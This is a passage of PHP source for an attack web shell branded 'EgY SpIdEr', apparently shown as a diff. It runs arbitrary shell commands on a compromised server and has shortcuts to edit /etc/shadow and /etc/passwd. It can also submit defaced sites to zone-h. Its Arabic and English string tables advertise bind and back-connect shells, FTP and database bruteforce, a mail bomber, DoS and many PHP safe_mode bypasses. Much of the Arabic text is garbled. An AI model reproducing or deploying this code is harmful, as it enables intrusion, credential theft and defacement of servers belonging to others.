($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); +}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet']; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "[ Can't complete the operation !! ]";} +else {callfuncs("chmod 777 $zpl;chmod 777 $li"); +ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); +print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();} +}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ +print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt> +www.site1.com +www.site2.com +</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " "; +input ("submit","zonesub","Send","");print $ef;die();} +print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>"; +function inisaf($iniv) { $chkini=ini_get($iniv); +if(($chkini || strtolower($chkini)) !=='on'){print"<font color=olive><b>OFF ( Not secured )</b></font>";} else{ +print"<font color=red><b>ON ( Secured )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif); +if ($chkin==""){print " <font color=red><b>None</b></font>";} +else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=olive>".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} +elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); +while (!feof($opop)){ $nval= fgetc($opop);}} +elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ +ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} +if($nval=$owhich){print"<font color=red><b>ON</b></font>";} +else{print"<font color=olive><b>OFF</b></font>";} } +print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } + + + if(isset($_GET['egy'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>EgY SpIdEr</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b><div align="center"> + <font face="tahoma" size="-2"><b> + <p align="center">&nbsp;</p> + <p align="center"> + <font style="FONT-WEIGHT: 500; FONT-SIZE: 100pt" face="Webdings" color="#800000"> +<IFRAME WIDTH=100% HEIGHT=671 SRC="http://egyspider.eu/ahmed/about.htm"></IFRAME></font></p> + <p align="center">&nbsp;</p> + <div id="n" align="center"> + &nbsp;</div> + <p>&nbsp;</font></b></div> +</b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } + if(isset($_GET['news'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>EgY SpIdEr</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b><div align="center"> + <font face="tahoma" size="-2"><b> + <p align="center">&nbsp;</p> + <p align="center"> + <font style="FONT-WEIGHT: 500; FONT-SIZE: 100pt" face="Webdings" color="#800000"> +<IFRAME WIDTH=100% HEIGHT=671 SRC="http://egyspider.eu/ahmed/news.htm"></IFRAME></font></p> + <p align="center">&nbsp;</p> + <div id="n" align="center"> + &nbsp;</div> + <p>&nbsp;</font></b></div> +</b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } + + +if(isset($_GET['5'])) + {$_POST['cmd'] = 'systeminfo';} +if(isset($_GET['6'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';} +if(isset($_GET['7'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';} +if(isset($_GET['8'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';} +if(isset($_GET['9'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';} +if(isset($_GET['10'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';} +if(isset($_GET['13'])) + {$_POST['cmd']='cat /proc/cpuinfo';} +if(isset($_GET['14'])) + {$_POST['cmd']='cat /proc/version';} +if(isset($_GET['15'])) + {$_POST['cmd'] = 'free';} +if(isset($_GET['16'])) + {$_POST['cmd'] = 'dmesg(8)';} +if(isset($_GET['17'])) + {$_POST['cmd'] = 'vmstat';} +if(isset($_GET['18'])) + {$_POST['cmd'] = 'lspci';} +if(isset($_GET['19'])) + {$_POST['cmd'] = 'lsdev';} +if(isset($_GET['20'])) + {$_POST['cmd']='cat /proc/interrupts';} +if(isset($_GET['21'])) + {$_POST['cmd'] = 'cat /etc/*realise';} +if(isset($_GET['22'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';} +if(isset($_GET['23'])) + {$_POST['cmd'] = 'lsattr -va';} +if(isset($_GET['24'])) + {$_POST['cmd'] = 'w';} +if(isset($_GET['25'])) + {$_POST['cmd'] = 'who';} +if(isset($_GET['26'])) + {$_POST['cmd'] = 'uptime';} +if(isset($_GET['27'])) + {$_POST['cmd'] = 'last -n 10';} +if(isset($_GET['28'])) + {$_POST['cmd'] = 'ps -aux';} +if(isset($_GET['29'])) + {$_POST['cmd'] = 'service --status-all';} +if(isset($_GET['30'])) + {$_POST['cmd'] = 'ifconfig';} +if(isset($_GET['31'])) + {$_POST['cmd'] = 'netstat -a';} +if(isset($_GET['32'])) + {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';} +if(isset($_GET['33'])) + {$_POST['cmd'] = 'fdisk -l';} +if(isset($_GET['34'])) + {$_POST['cmd'] = 'df -h';} + +#if(isset($_GET[''])) +# {$_POST['cmd'] = '';} + +$lang=array( +'ar_text1' =>'الام?المنفذ', +'ar_text2' =>'تنفي?الاوام?في السيرف?, +'ar_text3' =>'ام?التشغي?, +'ar_text4' =>'مكان عملك الان عل?السيرف?, +'ar_text5' =>'رف?مل?ال?السيرف?, +'ar_text6' =>'مسار ملفك', +'ar_text7' =>'اوام?جاهز?, +'ar_text8' =>'اختر الام?, +'ar_butt1' =>'تنفي?, +'ar_butt2' =>'رفـع', +'ar_text9' =>'فت?بورت في السيرف?عل?/bin/bash', +'ar_text10'=>'بـور?, +'ar_text11'=>'باسورد للدخول', +'ar_butt3' =>'فت?, +'ar_text12'=>'أتصـال عـكس?, +'ar_text13'=>'الاي بي', +'ar_text14'=>'المنفذ', +'ar_butt4' =>'أتـصال', +'ar_text15'=>'سح?ملفا?ال?السيرف?, +'ar_text16'=>'عن طريق', +'ar_text17'=>'رابط المل?, +'ar_text18'=>'مكان نزول?, +'ar_text19'=>'Exploits', +'ar_text20'=>'إستخدم', +'ar_text21'=>'الاس?الجديد', +'ar_text22'=>'انبو?البيانات', +'ar_text23'=>'البورت المحلي', +'ar_text24'=>'السيرف?البعيد', +'ar_text25'=>'المنفذ البعيد', +'ar_text26'=>'استخدم', +'ar_butt5' =>'تشغي?, +'ar_text28'=>'العم?في الوض?الام?, +'ar_text29'=>'ممنو?الدخول', +'ar_butt6' =>'تغير', +'ar_text30'=>'عر?مل?, +'ar_butt7' =>'عر?, +'ar_text31'=>'المل?غي?موجو?, +'ar_text32'=>'تنفي?كو?php عن طريق داله eval', +'ar_text33'=>'Test bypass open_basedir with cURL functions', +'ar_butt8' =>'اختبار', +'ar_text34'=>'قرائ?الملفا?عن طريق ثغره include', +'ar_text35'=>'قرائ?الملفا?عن طريق ثغره Mysql', +'ar_text36'=>'القاعد?. الجدول', +'ar_text37'=>'اس?المستخدم', +'ar_text38'=>'كلمة المرور', +'ar_text39'=>'القاعد?, +'ar_text40'=>'نسخة من جداو?القاعد?, +'ar_butt9' =>'نسخة', +'ar_text41'=>'حف?النسخة في', +'ar_text42'=>'تعدي?الملفا?, +'ar_text43'=>'المل?المراد تعديله', +'ar_butt10'=>'حف?, +'ar_text44'=>'لاتستطيع التعدي?عل?هذ?المل?فق?تقرأ', +'ar_text45'=>'تم الحف?, +'ar_text46'=>'عر?phpinfo()', +'ar_text47'=>'رؤية المتغيرا?في php.ini', +'ar_text48'=>'مس?ملفا?ال?temp', +'ar_butt11'=>'تحري?المل?, +'ar_text49'=>'مس?السكرب?من السيرف?, +'ar_text50'=>'عر?معلوما?الذاكر?الرئيسية', +'ar_text51'=>'عر?معلوما?الذاكر?, +'ar_text52'=>'بح?نص', +'ar_text53'=>'في المسار', +'ar_text54'=>'بح?عن نص في الملفا?, +'ar_butt12'=>'بح?, +'ar_text55'=>'فق?في الملفا?, +'ar_text56'=>'لايوجد :(', +'ar_text57'=>'انشا?مس?مل?مجلد', +'ar_text58'=>'الاس?, +'ar_text59'=>'مل?, +'ar_text60'=>'مجلد', +'ar_butt13'=>'إنشا?/مس?, +'ar_text61'=>'تم إنشا?المل?, +'ar_text62'=>'تم إنشا?المجلد', +'ar_text63'=>'تم مس?المل?, +'ar_text64'=>'تم مس?المجلد', +'ar_butt65'=>'إنشا?, +'ar_text66'=>'مس?, +'ar_text67'=>'التصري?المستخدم/المجموعة', +'ar_text68'=>'ام?, +'ar_text69'=>'إس?المل?, +'ar_text70'=>'التصري?, +'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'ar_text72'=>'النص المراد', +'ar_text73'=>'بح?في المجلدات', +'ar_text74'=>'بح?في الملفا?, +'ar_text75'=>'* you can use regexp', +'ar_text76'=>'البح?عن نص في ملفا?بواسطه find', +'ar_text80'=>'النو?, +'ar_text81'=>'الإتصالا?, +'ar_text82'=>'قواع?البيانات', +'ar_text83'=>'تشغي?ام?استعلا?, +'ar_text84'=>'استعلا?قاعد?, +'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'ar_text86'=>'تنزي?ملفا?من السيرف?, +'ar_butt14'=>'تحمي?, +'ar_text87'=>'تنزي?ملفا?من خادم الاف تي بي', +'ar_text88'=>'سيرف?الاف تي بي:المنفذ', +'ar_text89'=>'مل?في الاف تي بي', +'ar_text90'=>'التحوي?ال?, +'ar_text91'=>'ارشف?, +'ar_text92'=>'من غي?الارشف?, +'ar_text93'=>'الاف تي بي', +'ar_text94'=>'تخمي?الاف تي بي', +'ar_text95'=>'قائم?المستخدمين', +'ar_text96'=>'لم يستط?سح?قائم?المستخدمين', +'ar_text97'=>'تم الفح? ', +'ar_text98'=>'تم بنجا? ', +'ar_text99'=>'* استخدم اسما?المستخدمين في مل?/etc/passwd لدخو?لل?ftp', +'ar_text100'=>'ارسا?مل?ال?خادم الاف تي بي', +'ar_text101'=>'استخدم الاسام?معكوسه لتخمينها', +'ar_text102'=>'خدما?البريد', +'ar_text103'=>'ارسا?بريد', +'ar_text104'=>'ارسا?مل?ال?الايمي?, +'ar_text105'=>'إل?, +'ar_text106'=>'مـ?, +'ar_text107'=>'الموضو?, +'ar_butt15'=>'إرسا?, +'ar_text108'=>'الرسال?, +'ar_text109'=>'مخفي', +'ar_text110'=>'عر?, +'ar_text111'=>'سيرف?قواع?البيانات : المنفذ', +'ar_text112'=>'قرائ?الملفا?عن طريق ثغرة داله mb_send_mail', +'ar_text113'=>'قرائ?محتو?المجلدات عن طريق via imap_list', +'ar_text114'=>'قرائ?الملفا?عن طريق ثغرة via imap_body', +'ar_text115'=>'قرائ?الملفا?عن طريق compress.zlib://', +'ar_text116'=>'نس?من', +'ar_text117'=>'ال?, +'ar_text118'=>'تم نس?المل?, +'ar_text119'=>'لايستطيع النس?, +'ar_err0'=>'خطاء ! لايمكن الكتاب?عل?هذ?المل?', +'ar_err1'=>'خطاء ! غي?قادر عل?قرائ?هذ?المل?', +'ar_err2'=>'خطاء! لايمكن الانشا?', +'ar_err3'=>'خطاء! غي?قادر عل?الاتصا?بالا?تي بي', +'ar_err4'=>'خطاء ! لاتستطيع الدخول ال?سيرف?الاف تي بي', +'ar_err5'=>'خطاء ! لاتستطيع تغير المجلد في الاف تي بي', +'ar_err6'=>'خطاء ! لاتستطيع ارسا?رسال?, +'ar_err7'=>'البريد ارسل', +'ar_text200'=>'copy()قرائ?الملفا?عن طريق ثغرة', +'ar_text202'=>'مسار المل?المراد قرائته', +'ar_text300'=>'curl()قرائ?الملفا?عن طريق ثغرة', +'ar_text203'=>'ini_restore()قرائ?الملفا?عن طريق ثغرة', +'ar_text204'=>'error_log()زراع?الملفا?عن طريق ثغره', +'ar_text205'=>'أزرع الشل عل?هذ?المسار', +'ar_text206'=>'قرائ?محتويا?المجلد', +'ar_text207'=>'قرائ?محتويا?المجلدات عن طريق ثغره reg_glob', +'ar_text208'=>'تنفي?الاوام?في الوض?الام?عن طريق الدوال', +'ar_text209'=>'قرائ?محتويا?المجلدات عن طريق ثغره root', +'ar_text210'=>'فك تشفي?الزن?', +'ar_text211'=>'::اقفا?السي?مو?:', +'ar_text212'=>'php.ini اقفا?السي?مو?عن طريق زر?مل?, +'ar_text213'=>'htacces إقفا?المو?سكيورت?عن طريق زر?مل?, +'ar_text214'=>'أس?الادمن', +'ar_text215'=>'عنوا?السيرف?IRC ', +'ar_text216'=>'# أس?الغرفه مع', +'ar_text217'=>'اس?السيرف?المختر?, +'ar_text218'=>'لإيقاف السي?مو?ini_restore زر?مل?يحتو?عل?ثغره', +'ar_text219'=>'سح?ملفا?ال?السيرف?وتغي?اسمه?بالوضع الام?, +'ar_text220'=>'استعرا?الملفا?عن طريق ثغره symlink الخطوه الاولى', +'ar_text221'=>'ضغ?الملفا?لتحميلها من الموقع(بع?تحميله?لجهازك غي?امتداد المل?لامتداده السابق)1', +'ar_text222'=>'استعرا?الملفا?عن طريق ثغره symlink الخطوه الثاني?, +'ar_text223'=>'قرائ?الملفا?عن طريق الدوال', +'ar_text224'=>'PLUGIN قرائ?الملفا?عن طريق ثغره ', +'ar_text143'=>'التم? ', +'ar_text65'=>'انشا?, + + +'ar_text33'=>'تخطى السي?مو??open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'ar_text34'=>'قرائ?الملفا?عن طريق ثغرة include function', +'ar_text35'=>'قرائ?الملفا?عن طريق ثغرة load file in mysql', +'ar_text85'=>'قرائ?الملفا?عن طريق ثغرة commands execute via MSSQL server', +'ar_text112'=>'قرائ?الملفا?عن طريق ثغرة function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'ar_text113'=>'تخطى السي?مو??safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'ar_text114'=>'تخطى السي?مو??safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'ar_text115'=>'تخطى السي?مو??safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'ar_text116'=>'Copy from', +'ar_text117'=>'to', +'ar_text118'=>'File copied', +'ar_text119'=>'Cant copy file', +'ar_text120'=>'تخطى السي?مو??safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'ar_text121'=>'تخطى السي?مو??open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'ar_text122'=>'تخطى السي?مو??open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'ar_text123'=>'تخطى السي?مو??open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'ar_text124'=>'تخطى السي?مو??open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'ar_text126'=>'تخطى السي?مو??open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'ar_text127'=>'تخطى السي?مو??open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'تخطى السي?مو??open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'تخطى السي?مو??open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'تخطى السي?مو??open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'تخطى السي?مو??open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'تخطى السي?مو??open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_err3'=>'Error! Can\'t connect to ftp', +'ar_err4'=>'Error! Can\'t login on ftp server', +'ar_err5'=>'Error! Can\'t change dir on ftp', +'ar_err6'=>'Error! Can\'t sent mail', +'ar_err7'=>'Mail send', +'ar_text1' =>'Executed command', +'ar_text2' =>'Execute command on server', +'ar_text33'=>'تخطى السي?مو??open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'ar_text34'=>'قرائ?الملفا?عن طريق ثغرة include function', +'ar_text35'=>'قرائ?الملفا?عن طريق ثغرة load file in mysql', +'ar_text112'=>'قرائ?الملفا?عن طريق ثغرة function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'ar_text113'=>'تخطى السي?مو??safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'ar_text114'=>'تخطى السي?مو??safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'ar_text115'=>'تخطى السي?مو??safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'ar_text120'=>'تخطى السي?مو??safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'ar_text121'=>'تخطى السي?مو??open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'ar_text122'=>'تخطى السي?مو??open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'ar_text123'=>'تخطى السي?مو??open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'ar_text124'=>'تخطى السي?مو??open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'ar_text126'=>'تخطى السي?مو??open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'ar_text127'=>'تخطى السي?مو??open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'تخطى السي?مو??open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'تخطى السي?مو??open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'تخطى السي?مو??open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'تخطى السي?مو??open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'تخطى السي?مو??open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_text142'=>'Downloaders', +'ar_text137'=>'Useful', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'تخطى السي?مو??open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'تخطى السي?مو??open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'تخطى السي?مو??open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'تخطى السي?مو??open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'تخطى السي?مو??open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_text134'=>'Database-bruteforce', +'ar_text135'=>'Dictionary', +'ar_text136'=>'Creating evil symlink', +'ar_text137'=>'Useful', +'ar_text138'=>'Dangerous', +'ar_text139'=>'Mail Bomber', +'ar_text140'=>'DoS', +'ar_text141'=>'Danger! Web-daemon crash possible.', +'ar_text142'=>'Downloaders', +'ar_text143'=>'Temp: ', +'ar_text144'=>'قرائ?الملفا?عن طريق ثغرة load file in mysqli', +'ar_text145'=>'تخطى السي?مو??open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'ar_text146'=>'Max Interation', +'ar_text147'=>'', +'ar_text148'=>'', +'ar_text149'=>'', +'ar_text150'=>'', +'ar_err0'=>'Error! Can\'t write in file ', +'ar_err1'=>'Error! Can\'t read file ', +'ar_err2'=>'Error! Can\'t create ', +'ar_err3'=>'Error! Can\'t connect to ftp', +'ar_err4'=>'Error! Can\'t login on ftp server', +'ar_err5'=>'Error! Can\'t change dir on ftp', +'ar_err6'=>'Error! Can\'t sent mail', +'ar_err7'=>'Mail send', +'ar_text125'=>'Data', +'ar_text225'=>'زر?مل?لتلتخط?من خلال قاعد?البيانات ?4.4.7 / 5.2.3 PHP ', +'ar_text226'=>'تخطى السي?مو?بثغر?Root Directory: ', +'ar_text227'=>'زر?مل?لتخط?السف مو?بثغر?4.4.2/5.1.2', +'ar_text228'=>'زر?مل?لتخط?الحماي?لمنتدة الفى بى ', +'ar_text230'=>'زر?مل?لمعرفه كلما?المرور لمواقع السيرف?بدون تشفي?', +'ar_text151'=>'تخطى السي?مو?? chdir()and ftok() (PHP <= 5.2.6)', +'ar_text161'=>'تخطى السي?مو?? posix_access() (posix ext) (PHP <= 5.2.6)', +'ar_text147'=>'', +'ar_text148'=>'', +'ar_text149'=>'', +'ar_text150'=>'', +'ar_text159'=>'معلوما?عن egy spider', +'ar_text152'=>'اخ?الاخبا?, +'ar_text153'=>'خروج ', +'ar_text154'=>'وض?اندك?سريع?', +'ar_text155'=>'حق?اكوا?', +'ar_text156'=>'عر?الكو?', +'ar_text157'=>'التسجي?فى الزو?ات?', +'ar_text158'=>'ادوا?التشفي? ', +'ar_text160'=>'الرئسي? ', +'ar_text162'=>'اقفا?الدوال وتخط?السي?مو?من خلال ionCube (PHP <= 5.2.4)', +'ar_text163'=>'تشغي?البيرل عل?السيرف?', +'ar_text170'=>' تخطى السي?مو?والدوا?? Posix_getpw(PHP <= 4.2.0)', +'ar_text171'=>' PHP (Win32std) Extension تخطى السي?مو?وتخط?الدوال (PHP <= 5.2.3)', +'ar_text180'=>'ارسل ملاحظاتك واتص?بى ', +/* --------------------------------------------------------------- */ +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_butt3' =>'Bind', +'eng_butt4' =>'Connect', +'eng_butt5' =>'Run', +'eng_butt6' =>'Change', +'eng_butt7' =>'Show', +'eng_butt8' =>'Test', +'eng_butt9' =>'Dump', +'eng_butt10'=>'Save', +'eng_butt11'=>'Edit file', +'eng_butt12'=>'Find', +'eng_butt13'=>'Create/Delete', +'eng_butt14'=>'Download', +'eng_butt15'=>'Send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_text30'=>'Cat file', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without arch.', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'/etc/passwd', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu)', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'eng_text125'=>'Data', +'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'eng_text128'=>'Modify/Access file (touch)', +'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'eng_'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'eng_text134'=>'Database-bruteforce', +'eng_text135'=>'Dictionary', +'eng_text136'=>'Creating evil symlink', +'eng_text137'=>'Useful', +'eng_text138'=>'Dangerous', +'eng_text139'=>'Mail Bomber', +'eng_text140'=>'DoS', +'eng_text141'=>'Danger! Web-daemon crash possible.', +'eng_text142'=>'Downloaders', +'eng_text143'=>'Temp: ', +'eng_text144'=>'Test bypass safe_mode with load file in mysqli', +'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'eng_text146'=>'Max Interation', +'eng_text147'=>'', +'eng_text148'=>'', +'eng_text149'=>'', +'eng_text150'=>'', 